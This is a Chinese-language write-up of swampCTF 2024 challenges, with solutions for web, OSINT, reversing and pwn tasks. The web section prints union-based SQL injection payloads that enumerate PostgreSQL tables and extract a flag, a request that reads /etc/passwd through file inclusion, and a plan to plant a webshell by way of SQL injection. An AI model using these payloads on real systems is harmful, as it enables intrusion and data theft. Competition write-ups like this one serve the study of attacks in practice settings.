swampCTF 2024
MISC
Discord Challenge
swampCTF{w3lc0m3_t0_th3_swamp}
What the Form
google form不停重定向,直接F12看一下。flag就在前端。
swampCTF{F0rm5_K33p5_D4T4_H1dd3n}
OSINT
Lost in Space
图片是旅行者2号,问距离地球多少个天文单位。
136
Aerial Attack
解析图片exif信息,即可获得GPS坐标,按照规则构造即可。
(29.64,-82.33)
WEB
Potion Seller
看了hint是提示wtfjs,查看wtfjs文档的parseInt和Number部分,尝试了几个例子,发现1/1999999可以随意清空贷款绕过检查。
https://github.com/denysdovhan/wtfjs/blob/master/README-zh-cn.md
首先通过/borrow?amount=999999借入一定数量的金币。
然后在还款的时候利用repay?amount=1%20/%201999999绕过检测,实现贷款还款。
最后/checkout获得flag
BrailleDB-1
searchText处存在sql注入漏洞,尝试利用,却发现不存在database()函数,考虑不是mysql。
通过查询version,得知后端数据库是postgreSQL数据。
Q: searchText=-1' union select current_database()--
R: brailleDBQ:searchText=-1' union select relname from pg_stat_user_tables--
R: brailleQ: searchText=-1' union select column_name from information_schema.columns where table_name='braille'--
R: braille_representation
结合burp fuzzing offset位来读取列
Q: searchText=-1' union select relname from pg_stat_user_tables offset 1--
R: flag
有flag列和id列
Q:searchText=-1' union select column_name from information_schema.columns where table_name='flag' offset 0--
R: flag
Q:searchText=-1' union select column_name from information_schema.columns where table_name='flag' offset 1--
R: id
最后payload:
searchText=-1' union select flag from flag offset 0--
swampCTF{Un10n_A11_Th3_W4yyy!}
UnderConstruction
page参数,猜测可以任意文件读取。果然可以成功读取了/etc/passwd,读不了源码,会被直接解析。
登录处有sql注入漏洞,但是数据库中没有找到flag。考虑用sql注入读文件先读源码看看,限制了报错注入的字符回显长度,只能结合burp来慢慢获取源码。
index.php
<?php
ini_set('display_errors', 0);
if (isset($_GET['page']) {include("/var/www/html/".$_GET['page']);
} else { header('HTTP/1.1 301 Moved Permenently');header('Location: /?page=under_construction.php');
}
?>
果然是文件包含漏洞,所以应该考虑sql注入写webshell,然后文件包含执行。
/etc/mysql/mariadb.conf.d/50-server.cnf
# # These groups are read by MariaDB server.
# Use it for options that only the server (but not clients) should see # this is read by the standalone daemon and embedded servers [server]
# this is only for the mysqld standalone daemon [mysqld]
# # * Basic Settings
# user = mysql
pid-file = /run/mysqld/mysqld.pid
basedir = /usr
datadir = /var/lib/mysql
tmpdir = /tmp
lc-messages-dir = /usr/share/mysql
lc-messages = en_US skip-external-locking
# Broken reverse DNS slows down connections considerably and name resolve is
# safe to skip if there are no "host by domain name" access grants
#skip-name-resolve
# Instead of skip-networking the default is now to listen only on
# localhost which is more compatible and is not less secure.
bind-address = 127.0.0.1
# # * Fine Tuning
# #key_buffer_size = 128M
#max_allowed_packet = 1G
#thread_stack = 192K
#thread_cache_size = 8
# This replaces the startup script and checks MyISAM tables if needed
# the first time they are touched
#myisam_recover_options = BACKUP
#max_connections = 100
#table_cache = 64
# # * Logging and Replication
# # Both location gets rotated by the cronjob. # Be aware that this log type is a performance killer.
# Recommend only changing this at runtime for short testing periods if needed! #general_log_file = /var/log/mysql/mysql.log
#general_log = 1
# When running under systemd, error logging goes via stdout/stderr to journald
# and when running legacy init error logging goes to syslog due to
# /etc/mysql/conf.d/mariadb.conf.d/50-mysqld_safe.cnf
# Enable this if you want to have error logging into a separate file
#log_error = /var/log/mysql/error.log
# Enable the slow query log to see queries with especially long duration #slow_query_log_file = /var/log/mysql/mariadb-slow.log
#long_query_time = 10
#log_slow_verbosity = query_plan,explain
#log-queries-not-using-indexes
#min_examined_row_limit = 1000
# The following can be used as easy to replay backup logs or for replication.
# note: if you are setting up a replication slave, see REA
但是写文件没有成功,不管是webroot还是/tmp都没有成功。感觉应该是得写文件,然后文件包含执行shell。虽然没做出来但是也记录一下了。
RE
Beginner Rev
做异或运算,那么找一下byte_402010
这里的32个字节的字符。用python写一个脚本跑一下:
from Crypto.Util.number import *
codes = [0x32, 0x36, 0x20, 0x2C, 0x31, 0x2, 0x15, 0x7, 0x3A, 0x19, 0x71, 0x13, 0x1E, 0x28, 0x2F, 0x37, 0x71, 0x2D, 0x34, 0x35, 0x28, 0x71, 0x2F, 0x1E, 0x28, 0x74, 0x1E, 0x22, 0x71, 0x71, 0x2D, 0x3C]
result = ""
for i in codes:result += long_to_bytes(i^0x41).decode()
print(result)
swampCTF{X0R_inv0luti0n_i5_c00l}
PWN
Beginner Pwn 1
数组越界,内存溢出破坏其他变量。从而让自己成为admin。
swampCTF{y0u_@r3_a_h@ck3r}
